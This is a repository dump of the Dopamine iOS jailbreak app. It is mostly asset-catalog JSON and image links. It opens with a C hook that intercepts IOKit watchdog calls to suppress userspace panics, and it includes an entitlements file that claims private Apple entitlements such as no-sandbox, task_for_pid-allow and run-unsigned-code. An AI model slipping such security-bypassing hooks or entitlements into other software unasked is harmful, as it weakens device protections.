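kern_return_t IOConnectCallStructMethod_hook(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt)
{
    BOOL isWatchdogConnection = (gIOWatchdogConnection != MACH_PORT_NULL) && (connection == gIOWatchdogConnection);
    if (isWatchdogConnection && selector == 2 && jbdswInterceptUserspacePanic != NULL) {
        return (kern_return_t)jbdswInterceptUserspacePanic((const char *)inputStruct);
    }
    return IOConnectCallStructMethod_orig(connection, selector, inputStruct, inputStructCnt, outputStruct, outputStructCnt);
}

/*
 * Library constructor: resolves jbdswInterceptUserspacePanic from the images
 * already loaded and installs the two hooks above.
 */
__attribute__((constructor)) static void initializer(void)
{
    jbdswInterceptUserspacePanic = dlsym(RTLD_DEFAULT, "jbdswInterceptUserspacePanic");
    MSHookFunction(IOServiceOpen, (void *)&IOServiceOpen_hook, (void **)&IOServiceOpen_orig);
    MSHookFunction(IOConnectCallStructMethod, (void *)&IOConnectCallStructMethod_hook, (void **)&IOConnectCallStructMethod_orig);
}
--------------------------------------------------------------------------------
/Dopamine/.gitignore:
--------------------------------------------------------------------------------
/build
/*.tipa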
/Dopamine/bootstrap/basebin.tar 4 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "KernelPatchfinder", 6 | "repositoryURL": "https://github.com/opa334/KernelPatchfinder", 7 | "state": { 8 | "branch": "master", 9 | "revision": "fb34adb3c55154423cc18ec709fcb713bd67a890", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "PatchfinderUtils", 15 | "repositoryURL": "https://github.com/pinauten/PatchfinderUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "68f6e7f430d94bc01315b0f1e753e3764b9cc31d", 19 | "version": null 20 | } 21 | }, 22 | { 23 | "package": "SwiftfulLoadingIndicators", 24 | "repositoryURL": "https://github.com/SwiftfulThinking/SwiftfulLoadingIndicators", 25 | "state": { 26 | "branch": null, 27 | "revision": "85858c0246dcd781228301f9928519f75ce89758", 28 | "version": "0.0.4" 29 | } 30 | }, 31 | { 32 | "package": "SwiftMachO", 33 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 34 | "state": { 35 | "branch": "master", 36 | "revision": "7bcffb07259191f7103ded3d29c77f05b7fed396", 37 | "version": null 38 | } 39 | }, 40 | { 41 | "package": "SwiftUtils", 42 | "repositoryURL": 
"https://github.com/pinauten/SwiftUtils", 43 | "state": { 44 | "branch": "master", 45 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 46 | "version": null 47 | } 48 | }, 49 | { 50 | "package": "zstd", 51 | "repositoryURL": "https://github.com/facebook/zstd.git", 52 | "state": { 53 | "branch": "dev", 54 | "revision": "e256e4327459b77b14b300a7bc72b5a931cd1e56", 55 | "version": null 56 | } 57 | } 58 | ] 59 | }, 60 | "version": 1 61 | } 62 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "color" : { 5 | "color-space" : "srgb", 6 | "components" : { 7 | "alpha" : "1.000", 8 | "blue" : "0.529", 9 | "green" : "0.667", 10 | "red" : "0.020" 11 | } 12 | }, 13 | "idiom" : "universal" 14 | } 15 | ], 16 | "info" : { 17 | "author" : "xcode", 18 | "version" : 1 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/100.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/100.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/114.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/114.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/120.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/120.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/144.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/144.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/152.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/152.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/167.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/167.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/180.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/180.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/20.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/29.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/40.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/50.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/50.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/57.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/57.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/58.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/58.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/60.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/72.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/72.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/76.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/80.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/80.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/87.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/87.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Clouds.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Clouds@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Clouds@3x.jpg", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- 
/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "pexels-soubhagya-maharana-4124435.jpg", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "filename" : "fr.png", 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : 
"universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- 
/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- 
/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Artboard.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/FuguTransparent.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Artboard copy.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Artboard.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Artboard copy 2.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Pinauten_Logo_SecResearch_4096 copy 2.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Pinauten_Logo_SecResearch_4096 copy.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Pinauten_Logo_SecResearch_4096.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | }, 23 | "properties" : { 24 | "template-rendering-intent" : "template" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy 2.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096 copy.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/PinautenLogo.imageset/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "discord-mark-white.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/discord.imageset/discord-mark-white.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "GitHub-Mark-64px.png", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | }, 21 | "properties" : { 22 | "template-rendering-intent" : "template" 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Logos/github.imageset/GitHub-Mark-64px.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Sileo.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" 
: "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Package Managers/Sileo.imageset/Sileo.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Zebra.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Package Managers/Zebra.imageset/Zebra.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_1024.png -------------------------------------------------------------------------------- 
/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_2048.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/Assets.xcassets/Pinauten_Logo_SecResearch_4096.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 
3 | // 4 | 5 | #include 6 | 7 | #include "LSApplicationProxy.h" 8 | #include "LSApplicationWorkspace.h" 9 | #include "constants.h" 10 | #include "posix_spawn.h" 11 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Dopamine.entitlements: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.security.get-task-allow 6 | 7 | get-task-allow 8 | 9 | platform-application 10 | 11 | task_for_pid-allow 12 | 13 | run-unsigned-code 14 | 15 | proc_info-allow 16 | 17 | com.apple.private.persona-mgmt 18 | 19 | com.apple.private.tcc.allow 20 | 21 | kTCCServiceSystemPolicyAllFiles 22 | 23 | com.apple.private.security.storage-exempt.heritable 24 | 25 | com.apple.private.security.storage.AppBundles 26 | 27 | com.apple.private.security.no-sandbox 28 | 29 | com.apple.springboard.CFUserNotification 30 | 31 | com.apple.springboard.launchapplications 32 | 33 | com.apple.security.network.client 34 | 35 | com.apple.system-task-ports.control 36 | 37 | com.apple.system-task-ports.token.control 38 | 39 | com.apple.private.mobileinstall.allowedSPI 40 | 41 | InstallForLaunchServices 42 | Install 43 | UninstallForLaunchServices 44 | Uninstall 45 | UpdatePlaceholderMetadata 46 | 47 | com.apple.private.spawn-driver 48 | 49 | com.apple.developer.driverkit 50 | 51 | com.apple.developer.driverkit.transport.pci 52 | 53 | com.apple.developer.driverkit.builtin 54 | 55 | com.apple.developer.driverkit.transport.pci.offloadEngineDisable 56 | 57 | com.apple.private.security.kext-collection-management 58 | 59 | com.apple.private.security.kext-management 60 | 61 | com.apple.private.security.syspolicy.kext-management 62 | 63 | com.apple.security.exception.mach-lookup.global-name 64 | 65 | com.opa334.jailbreakd 66 | 67 | com.apple.security.exception.iokit-user-client-class 68 | 69 | AGXDeviceUserClient 70 | IOSurfaceRootUserClient 71 | 72 | com.apple.wifi.manager-access 73 | 74 | 
com.apple.security.exception.shared-preference.read-write 75 | 76 | com.opa334.Dopamine 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/DopamineApp.swift: -------------------------------------------------------------------------------- 1 | // 2 | // Fugu15App.swift 3 | // Fugu15 4 | // 5 | // Created by Linus Henze. 6 | // 7 | 8 | import SwiftUI 9 | 10 | var whatCouldThisVariablePossiblyEvenMean = { 11 | let date = Date() 12 | let calendar = Calendar.current 13 | let components = calendar.dateComponents([.day, .month], from: date) 14 | 15 | return components.day == 1 && components.month == 4 16 | }() 17 | 18 | struct Fugu15App: App { 19 | var body: some Scene { 20 | WindowGroup { 21 | JailbreakView() 22 | } 23 | } 24 | } 25 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | TSRootBinaries 6 | 7 | oobPCI 8 | tar 9 | 10 | UIViewControllerBasedStatusBarAppearance 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/JailbreakView.swift: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Liam0205/Dopamine/ec4fa85bb8fe3aa0c63bedb1d7ec90b1a4d11ff0/Dopamine/Dopamine/JailbreakView.swift -------------------------------------------------------------------------------- /Dopamine/Dopamine/Preview Content/Preview 